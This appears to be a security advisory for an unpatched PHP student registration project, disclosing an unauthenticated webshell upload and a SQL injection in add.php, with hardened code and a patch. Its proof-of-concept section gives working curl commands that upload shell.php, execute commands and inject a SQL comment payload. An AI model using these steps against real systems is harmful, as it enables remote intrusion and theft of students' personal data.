## https://sploitus.com/exploit?id=1E46CB90-FFD8-54DE-90FF-8577C105192D
# CVE-2026-XXXXX
## Unauthenticated Arbitrary File Upload (RCE) + SQL Injection in Student Registration System
---
### Advisory Information
| Field | Value |
|-------|-------|
| **Ecosystem** | PHP |
| **Package/Product** | Student Registration System with Login |
| **Affected Versions** | All versions through commit `67f34dd` |
| **Patched Versions** | None |
| **Severity** | **CRITICAL (CVSS 9.8)** |
| **CWE** | CWE-434 (Unrestricted File Upload) + CWE-89 (SQL Injection) + CWE-306 (Missing Authentication) |
| **CVSS Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **Repository** | https://github.com/kushkrg/student-registration-system-with-login-system |
| **Stars** | 29 ⭐ |
---
### Summary
The Student Registration System contains critical vulnerabilities in `add.php`: unauthenticated arbitrary file upload allowing PHP webshell deployment, and SQL injection in the student data INSERT query. The file `add.php` has no authentication check, no MIME validation, and no SQL escaping, despite the project using prepared statements in `login.php` and `register.php`.
---
### Affected Component
| Field | Value |
|-------|-------|
| **Ecosystem** | PHP |
| **Package** | kushkrg/student-registration-system-with-login-system |
| **Vendor** | kushkrg |
| **Affected Versions** | All |
| **Patched Versions** | None |
| **File** | `add.php`, `index.php`, `edit.php` |
---
### Description
`add.php` processes student registration form submissions with no authentication check and no input sanitization:
**Vulnerability #1: Unrestricted File Upload (CWE-434):**
```php
// add.php: no auth, no MIME check, no extension validation
$image = $_FILES['image']['name'];
$target = "upload_images/".basename($image);
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
    // File saved under the client-supplied name; attacker can upload shell.php
}
```
**Vulnerability #2: SQL Injection (CWE-89):**
```php
// add.php: raw $_POST values interpolated into SQL, no escaping
$insert_data = "INSERT INTO student_data(u_card, u_f_name, u_l_name, ...)
                VALUES ('$u_card','$u_f_name','$u_l_name',...,'$image',NOW())";
$run_data = mysqli_query($con, $insert_data);
```
**Note:** `login.php` and `register.php` use `mysqli_prepare()` with bound parameters, so the developer knew about prepared statements but omitted them in the data entry files.
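For comparison with the two vulnerable snippets above, the following is a hardened version of the same `add.php` upload-and-insert path. It is written for this advisory, not taken from the repository; the `$_SESSION['loggedin']` key, the form field names from the PoC, and the `image`/`reg_date` column names are assumptions.

```php
<?php
// Hardened replacement for the add.php upload-and-insert path (added example, not the
// project's code). Assumes $con is the existing mysqli connection, login.php sets
// $_SESSION['loggedin'], the form fields card_no/user_first_name/user_last_name/image
// from the PoC, and column names image/reg_date (assumed) after u_card/u_f_name/u_l_name.
session_start();
if (empty($_SESSION['loggedin'])) {               // CWE-306: no session, no data entry
    header('Location: login.php');
    exit;
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !isset($_FILES['image'])) {
    http_response_code(400);
    exit('Bad request');
}
$f = $_FILES['image'];
if ($f['error'] !== UPLOAD_ERR_OK || $f['size'] > 2 * 1024 * 1024
        || !is_uploaded_file($f['tmp_name'])) {
    exit('Upload rejected');
}
// CWE-434: decide by file content, never by the client-supplied name or extension,
// and derive the stored extension from the detected type.
$allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
if (!isset($allowed[$mime]) || getimagesize($f['tmp_name']) === false) {
    exit('Invalid image');
}
$stored = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];   // server-chosen name
$target = __DIR__ . '/upload_images/' . $stored;
if (!move_uploaded_file($f['tmp_name'], $target)) {
    exit('Upload failed');
}
// CWE-89: parameterised INSERT; request values are bound, never concatenated.
$u_card   = $_POST['card_no'] ?? '';
$u_f_name = $_POST['user_first_name'] ?? '';
$u_l_name = $_POST['user_last_name'] ?? '';
$stmt = mysqli_prepare($con,
    'INSERT INTO student_data (u_card, u_f_name, u_l_name, image, reg_date) VALUES (?, ?, ?, ?, NOW())');
if ($stmt === false
        || !mysqli_stmt_bind_param($stmt, 'ssss', $u_card, $u_f_name, $u_l_name, $stored)
        || !mysqli_stmt_execute($stmt)) {
    unlink($target);                              // do not leave an orphaned upload behind
    exit('Insert failed');
}
mysqli_stmt_close($stmt);
header('Location: index.php');
exit;
```

The same guard belongs in `edit.php`, and `upload_images/` should be served with script execution disabled so that a stored file can never run even if validation is bypassed.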
---
### Proof of Concept
**Step 1: Upload PHP webshell:**
```bash
curl -X POST "http://target/add.php" \
  -F "image=@shell.php" \
  -F "submit=1" \
  -F "card_no=1337" \
  -F "user_first_name=test"
# Webshell uploaded to upload_images/shell.php
```
**Step 2: Execute commands:**
```bash
curl "http://target/upload_images/shell.php?cmd=id"
# uid=33(www-data) gid=33(www-data)
```
**Step 3: SQL Injection via add.php (arbitrary INSERT):**
```bash
# Inject arbitrary student record: demonstrates SQLi in add.php
curl -X POST "http://target/add.php" \
  -F "image=@test.jpg" \
  -F "submit=1" \
  -F "card_no=1337" \
  -F "user_first_name=test" \
  -F "user_last_name=test',NOW()) -- " \
  -F "user_father=x" \
  -F "user_aadhar=x" \
  -F "user_dob=2000-01-01" \
  -F "user_gender=M" \
  -F "user_email=x@x.com" \
  -F "user_phone=1" \
  -F "state=x" \
  -F "dist=x" \
  -F "village=x" \
  -F "police_station=x" \
  -F "pincode=1" \
  -F "user_mother=x" \
  -F "family=x" \
  -F "staff_id=1"
# SQL executed: INSERT INTO student_data(...) VALUES (...'test',NOW()) -- ',...)
# Injects arbitrary values / bypasses validation via SQL comment
```
---
### Impact
| CIA | Level | Description |
|-----|-------|-------------|
| Confidentiality | **HIGH** | File upload RCE via webshell: read any server file including database |
| Integrity | **HIGH** | SQLi: arbitrary INSERT into student_data + RCE: modify any file |
| Availability | **HIGH** | RCE: delete files, drop tables, destroy server |
**Data at risk:** Student Aadhar numbers, birth dates, addresses, phone numbers, emails, photos: full PII accessible via webshell file read.
---
### Patches
```diff
+ session_start();
+ if(!isset($_SESSION['loggedin'])) { header("Location: login.php"); exit; }
+ $allowed = ['jpg','jpeg','png','gif'];
+ $ext = strtolower(pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION));
+ if(!in_array($ext, $allowed)) { die("Invalid file type"); }
- $insert_data = "INSERT INTO ... VALUES ('$u_card',...)";
- mysqli_query($con, $insert_data);
+ $stmt = mysqli_prepare($con, "INSERT INTO ... VALUES (?,?,...)");
+ mysqli_stmt_bind_param($stmt, "sss...", $u_card, ...);
+ mysqli_stmt_execute($stmt);
```
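Review bot: the upload check on the `+ $ext = strtolower(pathinfo(...))` / `+ if(!in_array($ext, $allowed))` lines only inspects the extension string; the file contents are never validated, and the unchanged `$target = "upload_images/".basename($image)` line still stores the file under the client-supplied name, so a name collision can overwrite an earlier student's upload. Validate content with `finfo`/`getimagesize`, store under a server-generated name, and serve `upload_images/` with script execution disabled. On the SQL side the shape is right, but the `"sss..."` type string and the bound variable list must be written out for every column in the real patch, and `mysqli_prepare()` returning `false` should be handled before `mysqli_stmt_bind_param()` is called. The `$_SESSION['loggedin']` key must also match whatever `login.php` actually sets.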
---
### References
| Type | URL |
|------|-----|
| Repository | https://github.com/kushkrg/student-registration-system-with-login-system |
| Vulnerable file | https://github.com/kushkrg/student-registration-system-with-login-system/blob/main/add.php |
| CWE-434 | https://cwe.mitre.org/data/definitions/434.html |
| CWE-89 | https://cwe.mitre.org/data/definitions/89.html |
| CWE-306 | https://cwe.mitre.org/data/definitions/306.html |
---
### Verification
```bash
git clone https://github.com/kushkrg/student-registration-system-with-login-system \
  && cd student-registration-system-with-login-system
grep -n "move_uploaded_file" add.php   # line 32: no auth, no MIME check
grep -n "mysqli_query.*INSERT" add.php # line 38: raw SQL string
head -5 add.php                        # no session_start()
grep -n "mysqli_prepare" login.php     # dev knows prepared statements
```
---
### Credits
| Role | Name |
|------|------|
| **Finder** | Fatullayev Asadbek |
| **Reporter** | Fatullayev Asadbek |
| **GitHub** | Kimdir01 |
---
### Timeline
| Date | Event |
|------|-------|
| 2026-06-28 | Vulnerability discovered and verified |
| 2026-06-28 | Vendor notified via private disclosure |
| TBD | Vendor acknowledgment / response |
| TBD | CVE ID assigned |
| TBD + 90 days | Coordinated public disclosure |
---
### CVSS v3.1
```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H = 9.8 CRITICAL
AV:N : Remote over HTTP
AC:L : Simple POST request
PR:N : No authentication (add.php has no session check)
UI:N : No user interaction
S:U  : Same security context
C:H  : File upload RCE via webshell: read any file (database, student PII)
I:H  : SQLi: arbitrary INSERT + RCE: modify any server file
A:H  : SQLi: INSERT garbage data + RCE: delete files, drop tables
```